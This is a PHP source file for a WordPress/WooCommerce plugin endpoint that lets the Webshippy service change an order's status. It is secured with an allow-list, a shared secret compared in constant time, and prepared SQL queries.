<?php

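/**
 * User 'manual'
 *
 * @link (to call)
 * http://example.com/wp-content/plugins/webshippy/webshippy_set_status.php?id={order_id}&status={order_status}&secret={webshippy_secrect}
 *
 * order_id:
 *  the post id in wordpress posts table
 *
 * name (optional):
 *  the order number; the script also reads this parameter and, when it is
 *  present, matches the order by its order number
 *
 * order_status (like enum):
 *  - pending     - Awaiting payment
 *  - on-hold     - Awaiting payment
 *  - processing  - Processing
 *  - failed      - Failed
 *  - completed   - Completed
 *  - refunded    - Refunded
 *  - cancelled   - Cancelled
 *
 * webshippy_secrect:
 *  - Webshippy Secret API Key
 *
 * Security note: the secret is sent in the query string, so it is recorded
 * wherever request URLs are stored (web-server access logs, proxies). Call
 * this endpoint over HTTPS only and treat logged URLs as sensitive.
 */

// Turn on output buffering. The "@" keeps a failure here from leaking a PHP
// warning into the plain-text reply.
@ob_start();

// Every reply is a single "result|detail" line of plain text. The media type
// must be spelled "text/plain": an unknown type leaves the client to guess how
// to handle the body.
@header('Content-Type: text/plain; charset=utf-8');

// Allow-list of the order statuses this endpoint may set.
$statusArr = array(
	'pending', // Awaiting payment
	'on-hold', // Awaiting payment
	'processing', // Processing
	'failed', // Failed
	'completed', // Completed
	'refunded', // Refunded
	'cancelled', // Cancelled
);

// A missing or non-string "status" (for example status[]=x) becomes an empty
// string and is rejected by the allow-list check below, instead of reaching
// trim() as null or as an array.
$status = (isset($_GET['status']) && is_string($_GET['status'])) ? trim($_GET['status']) : '';

// Strict comparison: only an exact string match against the allow-list passes.
if (in_array($status, $statusArr, true) === false) {
	die('error|incorrect status.');
}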

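// Load WordPress through its configuration file; after this $wpdb and
// $table_prefix are available in the global scope.
require_once __DIR__ . '/../../../wp-config.php';
global $wpdb;

// check secret
// A missing or non-string "secret" (for example secret[]=x) is treated as empty.
$providedSecret = (isset($_GET['secret']) && is_string($_GET['secret'])) ? $_GET['secret'] : '';

// Fetch the configured key and compare it in PHP. Comparing inside the SQL
// WHERE clause follows the column collation (commonly case-insensitive) and
// also matches an empty request value against an empty stored value.
$storedSecret = $wpdb->get_var(
    $wpdb->prepare(
        "SELECT option_value FROM " . $table_prefix . "options
        WHERE option_name = %s",
        'webshippy_secrect'
    )
);

// Fail closed: an unconfigured (missing or empty) key never authenticates, and
// hash_equals() keeps the comparison exact and constant-time.
if (
    $providedSecret === ''
    || !is_string($storedSecret)
    || $storedSecret === ''
    || !hash_equals($storedSecret, $providedSecret)
) {
	die('error|authentication failed. (1)');
}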

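// Read the order identifiers defensively: a missing or array-valued parameter
// must not reach the casts, preg_replace() or the comparisons below.
$orderId = (isset($_GET['id']) && is_string($_GET['id'])) ? $_GET['id'] : '';
$orderName = (isset($_GET['name']) && is_string($_GET['name'])) ? $_GET['name'] : null;

/**
 * Check order
 *
 * Collect candidate posts: by post id (the raw integer cast, and the digits
 * extracted from "id") or by an order-number meta value stored either in
 * postmeta or in wc_orders_meta. All request values are bound through
 * $wpdb->prepare() placeholders.
 */
$order = null;

$wpPosts = $wpdb->get_results(
    $wpdb->prepare(
        "
            SELECT 
                p.id,
                p.post_type
            FROM " . $table_prefix . "posts AS p 
            LEFT JOIN " . $table_prefix . "postmeta AS pm
                ON p.id = pm.post_id AND pm.meta_key  in ('_order_number', '_order_number_formatted')
            LEFT JOIN " . $table_prefix . "wc_orders_meta AS om
                ON p.id = om.order_id AND om.meta_key  in ('_order_number', '_order_number_formatted')
            WHERE 
                p.id = %d
                OR p.id = %d
                OR pm.meta_value = %s
                OR om.meta_value = %s",
        [
            (int) $orderId,
            preg_replace('/\D/', '', $orderId),
            $orderName ?? $orderId,
            $orderName ?? $orderId,
        ]
    )
);

foreach ($wpPosts as $post) {
    // Only order posts qualify; the strict flag rules out loose type juggling.
    if (!in_array($post->post_type, ['shop_order', 'shop_order_placehold'], true)) {
        continue;
    }

    // NOTE(review): the order constructor is expected to throw when the order
    // data cannot be loaded; skip such a candidate rather than abort the reply.
    try {
        $tmpOrder = new WC_Order($post->id);
    } catch (Exception $e) {
        continue;
    }

    // Exact comparisons only. Loose "==" between request strings and order
    // identifiers gives PHP-version-dependent results ('1e3' == '1000', and
    // 12 == '12abc' before PHP 8), which could select the wrong order.
    $nameMatches = $orderName !== null
        && $orderName !== ''
        && (string) $tmpOrder->get_order_number() === $orderName;
    $idMatches = ctype_digit($orderId)
        && (int) $tmpOrder->get_id() === (int) $orderId;

    if ($nameMatches || $idMatches) {
        $order = $tmpOrder;
        break;
    }
}

if (empty($order)) {
    die('error|order is not found or post type is incorrect.');
}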

// Report success when the order already has the requested status, or when the
// status change is applied now. The short-circuit "||" keeps update_status()
// from being called for an order that is already in the target state.
$alreadyInTargetStatus = ($order->get_status() === $status);

if ($alreadyInTargetStatus || $order->update_status($status, 'Triggered by Webshippy' . PHP_EOL) === true) {
    die('success|ok');
}

// update_status() did not return true: the caller is told that nothing changed.
die('success|no-changes');